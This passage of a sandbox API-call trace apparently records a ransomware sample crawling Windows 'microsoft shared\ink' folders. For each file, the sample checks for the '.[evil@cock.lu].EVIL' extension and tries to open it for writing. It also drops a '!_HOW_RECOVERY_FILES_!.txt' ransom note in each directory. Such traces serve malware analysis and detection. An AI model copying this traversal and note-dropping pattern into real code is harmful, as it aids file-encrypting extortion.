shared\\ink\\hu-hu\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.576] GetLastError () returned 0x5 [0088.576] FindNextFileW (in: hFindFile=0x84b11dde00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.576] FindClose (in: hFindFile=0x84b11dde00 | out: hFindFile=0x84b11dde00) returned 1 [0088.577] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU") returned 0x39 [0088.577] strlen (_Str="${KEY}") returned 0x6 [0088.577] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.577] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.577] strlen (_Str="${CODE}") returned 0x7 [0088.577] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.577] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.577] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.577] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.577] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.577] __uncaught_exception () returned 0x84b1160800 [0088.577] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.578] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.578] wcsstr (_Str="hwrcommonlm.dat", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.578] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat") returned 67 [0088.578] wcscmp (_String1="hwrcommonlm.dat", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.578] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="hwrcommonlm.dat") returned 0x0 [0088.578] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat") returned 0x43 [0088.578] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.578] GetLastError () returned 0x5 [0088.578] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.578] wcsstr (_Str="HWRCustomization", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.578] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization") returned 68 [0088.578] wcscmp (_String1=".", _String2="HWRCustomization") returned -1 [0088.578] wcscmp (_String1="..", _String2="HWRCustomization") returned -1 [0088.578] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization") returned 0x44 [0088.578] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization") returned 0x0 [0088.578] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*" [0088.578] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd0e0 [0088.578] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.578] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\.") returned 70 [0088.578] wcscmp (_String1=".", _String2=".") returned 0 [0088.578] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.578] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.578] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\..") returned 71 [0088.578] wcscmp (_String1=".", _String2="..") returned -1 [0088.579] wcscmp (_String1="..", _String2="..") returned 0 [0088.579] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.579] FindClose (in: hFindFile=0x84b11dd0e0 | out: hFindFile=0x84b11dd0e0) returned 1 [0088.579] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization") returned 0x44 [0088.579] strlen (_Str="${KEY}") returned 0x6 [0088.579] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.579] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.579] strlen (_Str="${CODE}") returned 0x7 [0088.579] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.579] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.579] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.579] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.579] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.579] __uncaught_exception () returned 0x84b1160800 [0088.579] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.580] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.580] wcsstr (_Str="hwrenclm.dat", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.580] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat") returned 64 [0088.580] wcscmp (_String1="hwrenclm.dat", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.580] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="hwrenclm.dat") returned 0x0 [0088.580] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat") returned 0x40 [0088.580] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.624] GetLastError () returned 0x5 [0088.624] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.624] wcsstr (_Str="hwrlatinlm.dat", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.624] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat") returned 66 [0088.624] wcscmp (_String1="hwrlatinlm.dat", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.624] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="hwrlatinlm.dat") returned 0x0 [0088.624] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat") returned 0x42 [0088.624] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.625] GetLastError () returned 0x5 [0088.625] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.625] wcsstr (_Str="hwrusalm.dat", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.625] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat") returned 64 [0088.625] wcscmp (_String1="hwrusalm.dat", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.625] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="hwrusalm.dat") returned 0x0 [0088.625] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat") returned 0x40 [0088.625] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.625] GetLastError () returned 0x5 [0088.625] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.625] wcsstr (_Str="hwrusash.dat", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.625] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 64 [0088.625] wcscmp (_String1="hwrusash.dat", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.625] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="hwrusash.dat") returned 0x0 [0088.625] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 0x40 [0088.625] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.633] GetLastError () returned 0x5 [0088.633] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.633] wcsstr (_Str="InkDiv.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.633] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\InkDiv.dll") returned 62 [0088.633] wcscmp (_String1="InkDiv.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.633] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="InkDiv.dll") returned 0x0 [0088.633] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\InkDiv.dll") returned 0x3e [0088.633] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\InkDiv.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkdiv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.633] GetLastError () returned 0x5 [0088.633] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.633] wcsstr (_Str="InkObj.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.633] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll") returned 62 [0088.633] wcscmp (_String1="InkObj.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.633] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="InkObj.dll") returned 0x0 [0088.633] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll") returned 0x3e [0088.633] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.633] GetLastError () returned 0x5 [0088.634] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.634] wcsstr (_Str="InputPersonalization.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.634] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe") returned 76 [0088.634] wcscmp (_String1="InputPersonalization.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.634] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="InputPersonalization.exe") returned 0x0 [0088.634] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe") returned 0x4c [0088.634] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inputpersonalization.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.634] GetLastError () returned 0x5 [0088.634] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.634] wcsstr (_Str="ipsar.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.634] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 61 [0088.634] wcscmp (_String1="ipsar.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.634] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipsar.xml") returned 0x0 [0088.634] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 0x3d [0088.634] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.635] GetLastError () returned 0x5 [0088.635] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.635] wcsstr (_Str="ipscat.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.635] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml") returned 62 [0088.636] wcscmp (_String1="ipscat.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.636] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipscat.xml") returned 0x0 [0088.636] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml") returned 0x3e [0088.636] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.636] GetLastError () returned 0x5 [0088.636] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.636] wcsstr (_Str="ipschs.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.636] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml") returned 62 [0088.636] wcscmp (_String1="ipschs.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.636] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipschs.xml") returned 0x0 [0088.636] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml") returned 0x3e [0088.636] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.636] GetLastError () returned 0x5 [0088.636] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.636] wcsstr (_Str="ipscht.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.636] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml") returned 62 [0088.636] wcscmp (_String1="ipscht.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.636] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipscht.xml") returned 0x0 [0088.636] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml") returned 0x3e [0088.636] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.637] GetLastError () returned 0x5 [0088.637] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.637] wcsstr (_Str="ipscsy.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.637] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml") returned 62 [0088.637] wcscmp (_String1="ipscsy.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.637] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipscsy.xml") returned 0x0 [0088.637] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml") returned 0x3e [0088.637] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.637] GetLastError () returned 0x5 [0088.637] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.637] wcsstr (_Str="ipsdan.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.637] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml") returned 62 [0088.637] wcscmp (_String1="ipsdan.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.637] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipsdan.xml") returned 0x0 [0088.637] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml") returned 0x3e [0088.637] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.637] GetLastError () returned 0x5 [0088.637] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.637] wcsstr (_Str="ipsdeu.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.637] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml") returned 62 [0088.637] wcscmp (_String1="ipsdeu.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.637] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipsdeu.xml") returned 0x0 [0088.637] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml") returned 0x3e [0088.637] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.638] GetLastError () returned 0x5 [0088.638] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.638] wcsstr (_Str="ipsel.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.638] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml") returned 61 [0088.638] wcscmp (_String1="ipsel.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.638] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipsel.xml") returned 0x0 [0088.638] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml") returned 0x3d [0088.638] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsel.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.638] GetLastError () returned 0x5 [0088.638] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.638] wcsstr (_Str="ipsen.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.638] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml") returned 61 [0088.638] wcscmp (_String1="ipsen.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.638] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipsen.xml") returned 0x0 [0088.639] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml") returned 0x3d [0088.639] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.639] GetLastError () returned 0x5 [0088.639] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.639] wcsstr (_Str="ipsesp.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.639] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml") returned 62 [0088.639] wcscmp (_String1="ipsesp.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.639] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipsesp.xml") returned 0x0 [0088.639] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml") returned 0x3e [0088.639] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.639] GetLastError () returned 0x5 [0088.639] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.639] wcsstr (_Str="IPSEventLogMsg.dll", 